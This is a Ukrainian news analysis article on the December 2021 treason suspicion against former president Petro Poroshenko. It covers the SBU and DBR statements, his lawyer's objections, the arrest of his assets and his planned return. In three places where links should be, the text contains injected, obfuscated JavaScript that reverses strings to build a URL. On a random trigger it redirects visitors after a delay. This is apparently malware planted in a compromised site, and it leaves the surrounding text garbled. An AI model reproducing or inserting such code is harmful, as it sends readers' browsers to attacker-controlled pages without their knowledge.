АналітикаПідозра про зраду: втік чи працює

Підозра про зраду: втік чи працює

-

Підозра про зраду: втік чи працює

Ще під час передвиборчої кампанії Володимира Зеленського лунали гучні заяви, що багато високопосадовців та олігархів буде притягнуто до відповідальності. За те, що ці обіцянки не виконувались, до очільника держави звертались з питанням: «Де посадки?» Під пильний нагляд правоохоронних органів вже потрапив Віктор Медведчук та його наближені. До кінця 2021 року одному з тих, кого обіцяв посадити президент України Володимир Зеленський, вдавалося уникати преслідувань з боку влади. Проте ніщо не вічно, і 20 грудня Служба безпеки України повідомила, що вручила колишньому очільнику держави Петру Порошенко підозру у державній зраді.

Правозахисники Петра Порошенка виправдовують ці дії як спробу тиску на опозицію, адже будь-яка судова справа впливає на рейтинг як самого обвинуваченого, так і на підтримку партії, яку він очолює. Адвокати намагаються запевнити громадськість у тому, що ця справа замовна та її слід розглядати як політичну.

Офіційне звинувачення

Про вручення підозри колишньому очільнику держави одразу повідомили на офіційних сторінках у Facebook як $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory_fbid=3172722616291055&id=1536845479878785&__cft__%5B0%5D=AZUfzdihqujEHyLeLC0YVY9kT7mIfn-qXJyGcesk-t_sRhifyc6p4RDmq3HcUod3QrN_1f7dXITPFvw63tDTo_K-waY3ZfXnZYUqu-DcSz8heDu9ztbTf8UZ9O5JbOKtVMzmEoYpvU-30iaoDKxQc-Dh&__tn__=%2CO%2CP-R”>СБУ, так і ДБР. Далі наводимо текст публікації СБУ:


«Петру Порошенку оголошено підозру про державну зраду та сприяння тероризму

За матеріалами Служби безпеки України та Державного бюро розслідувань п’ятому Президенту і чинному народному депутату Петру Порошенку оголошено підозру у вчиненні злочинів, передбачених статтями 111 «Державна зрада» та ч. 1 ст. 258-3 «Сприяння діяльності терористичних організацій» Кримінального кодексу України.

Про це на брифінгу повідомили керівники слідчих підрозділів СБУ.

Слідство вважає, що під час виконання повноважень президента високопосадовець поставив Україну в енергетичну залежність від РФ та підконтрольних їй ватажків псевдореспублік.

В основу підозри лягли покази свідків, висновки судових експертиз, аудіофайли, документи, на яких зафіксована інформація періоду 2014-2015 років та інші докази.

«У своїй сукупності вони свідчать, що Петро Порошенко, перебуваючи в той час на посаді президента України, використав надані йому повноваження та інструменти впливу, щоб контракти з ПАР були розірвані. А потім на вимогу представників РФ організував підписання від імені України контрактів на постачання вугілля з непідконтрольних територій», – повідомив начальник управління Головного слідчого управління СБУ Анатолій Буліч.

За версією слідства, такі дії були допомогою РФ і терористичним організаціям, так званим Л/ДНР, у підривній діяльності проти України. А відтак є однією з форм державної зради.

Підписання та вручення нардепу повідомлення про підозру відбулося у відповідності до Кримінального процесуального кодексу України (направлено за місцем проживання, реєстрації, а також за місцем роботи).

Анатолій Буліч підкреслив, що розслідування даного кримінального провадження відбувається у межах закону, і закликав не переводити його у політичну площину.

У свою чергу керівник Головного слідчого управління СБУ Андрій Швець повідомив, що раніше спецслужба оголосила підозри трьом фігурантам даного провадження в рамках розслідування цієї резонансної справи.

Він нагадав, що розірвання контрактів з ПАР спровокувало хвилю «віялових» відключень електроенергії в нашій країні. А незаконні схеми для постачання вугілля з тимчасово окупованих територій на державні підприємства України були організовані за сприяння народного депутата Віктора Медведчука під впливом РФ.

За час функціонування цих схем проросійських терористів загалом було профінансовано на суму понад 200 млн гривень.

Дане кримінальне провадження СБУ та ДБР розслідують під процесуальним керівництвом Офісу Генерального прокурора».


Підписала не Венедіктова

Зі схожою заявою як і у СБУ, виступило і Державне бюро розслідувань, наводимо текст публікації: 


«П’ятому Президенту України повідомлено про підозру у державній зраді та сприянні діяльності терористичних організацій

П’ятому Президенту України, нині народному депутату України, повідомлено про підозру у вчиненні державної зради та сприянні діяльності терористичних організацій.

Працівники ДБР у взаємодії зі СБУ та під процесуальним керівництвом Офісу Генерального прокурора розслідують кримінальне провадження щодо організації злочинної схеми постачання вугілля із тимчасово окупованих територій та сприяння терористичним організаціям «ЛНР» та «ДНР» групою громадян України на загальну суму близько 1,5 мільярда гривень.

П’ятий Президент України підозрюється у тому, що він, діючи за попередньою змовою групою осіб, зокрема з числа представників вищого керівництва Російської Федерації, сприяв діяльності терористичних організацій «ЛНР» та «ДНР».


Слід зазначити, що під час брифінгу ДБР з приводу підозри народному депутату та колишньому очільнику України було оголошено важливу деталь. Підозру було підписано не головним прокурором Іриною Венедіктовою, а її заступником, який у той день нібито виконував обов’язки головного прокурора.

Звинувачуваний знає?

Як заявив адвокат Ігор Головань, який виступає представником колишнього очільника України, за поданими до суду документами повідомлення про підозру було вручено Порошенку 20 грудня, хоча той виїхав з України ще 17 грудня, він також підкреслив: «Вони не надали жодного документа, що хоча б направили повідомлення про підозру поштою, тобто ми бачимо абсолютне беззаконня, абсолютне нехтування нормами права, спрямоване винятково на одне — перешкодити лідеру опозиції здійснювати політичну діяльність». 

У мережі розповсюдилось відео, де представники Державного бюро розслідувань намагалися вручити Петру Порошенко підозру, проте охорона не підпустила до нього, та в терміновому порядку увезла колишнього гаранта. На сайті партії «Європейська Солідарність» була розміщена заява, що він відправився у «дипломатичне турне». Якщо проаналізувати сторінку Петра Порошенко у соціальній мережі Facebook, то стає зрозуміло, що станом на 18 грудня колишній очільник держави вже зустрівся з Вселенським Патріархом Варфоломієм у його резиденції у Стамбулі. Таку важливу зустріч неможливо організувати без попереднього планування. Тому слід поставити питання з приводу того, чи справді було проведено усі необхідні заходи з повідомлення про підозру та чи справді йому вручили підозру 20 грудня.

Відмова та реакція

У відповідь на підозру сам Петро Порошенко зробив ряд гучних заяв, проте основна ідея всіх заяв була однакова – він не збирається повертатися в Україну завчасно, до того як проведе усі заплановані заходи за кордоном. І дійсно, вже 21 грудня відбулася його зустріч у Варшаві з головою Комітету у закордонних справах Сейму Мареком Кухцінським. Таким чином, Петро Порошенко розпланував свої робочі візити за кордоном, та відмовився повертатися, однак запевнив, що одразу після повернення в Україну він звернеться до прокуратури. Також, коментуючи своє інтерв’ю 5 телеканалу, він $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory_fbid=2665837456883963&id=474409562693441&__cft__%5B0%5D=AZUcWg-Y8dV2rfuwUmYEAKz8uosoLm2RQCzbRgw1dDIyshJcRsiuOiL0HZdeh7ad4UEeZAaIE5mqo0RQPeg4ysCKnAJtt8KKZdzx5SvEtejRs2E1s5-MdsqVOjMXMiOylPHt1Yswi2tJGY-Ost5LAMK_G-Y41zFlCT_e-nYAjqAydQ&__tn__=%2CO%2CP-R”>зазначив: «У мене є свій графік. І я ламати його через примхи і незаконні забаганки Зеленського не збираюсь!»

Арешт майна

Невдовзі Печерський суд Києва ухвалив рішення, яким арештував все майно і активи екс-президента Петра Порошенка. Цю інформацію $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}togo-prezidenta-ukrayini”>опублікувала прес-служба офісу генерального прокурора.

Адвокат, який захищає інтереси Петра Порошенка, одразу прокоментував таку подію: «Ми говорили, що йде політичне переслідування Петра Порошенка. Зараз наклали арешт на все майно Петра Олексійовича, хоча ми знаємо, що Печерський суд перебуває поза юрисдикцією розслідувань ДБР», – заявив Ігор Головань.

За словами адвоката, про упередженість суду свідчить те, що текст ухвали був підготовлений дуже швидко, хоча лише написання переліку арештованого майна мало зайняти багато часу. 

Повний текст ухвали, в якому й буде детальний перелік арештованих об’єктів, з заяви судді Віти Бортницької мають оприлюднити 14 січня, втім адвокат наголошує, що йде мова про арешт усього майна екс-президента. Захист вже заявив, що адвокати подаватимуть апеляцію на ухвалу про арешт.

Чи повернеться

Зважаючи на ситуацію навколо колишнього очільника України, багато хто почав міркувати, повернеться Петро Порошенко до України чи ні. У своїй публікації на офіційній сторінці, Петро Порошенко 6 січна вказав: «17 січня я, як і обіцяв, повернуся до Києва, аби з’явитися у суді та провести зустріч із Генеральним прокурором, користуючись правом народного депутата на невідкладний прийом. Повертаюся не для того, щоби захищатися від Зеленського, а для того, щоб захищати Україну від некомпетентного керівництва і зовнішньої агресії. Від спроб зелених клептократів збудувати авторитарний режим і придушити опозицію, як це відбулося в Білорусі, Росії та Казахстані. І як це Янукович марно намагався зробити в Україні».

Олексій Мотревич

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам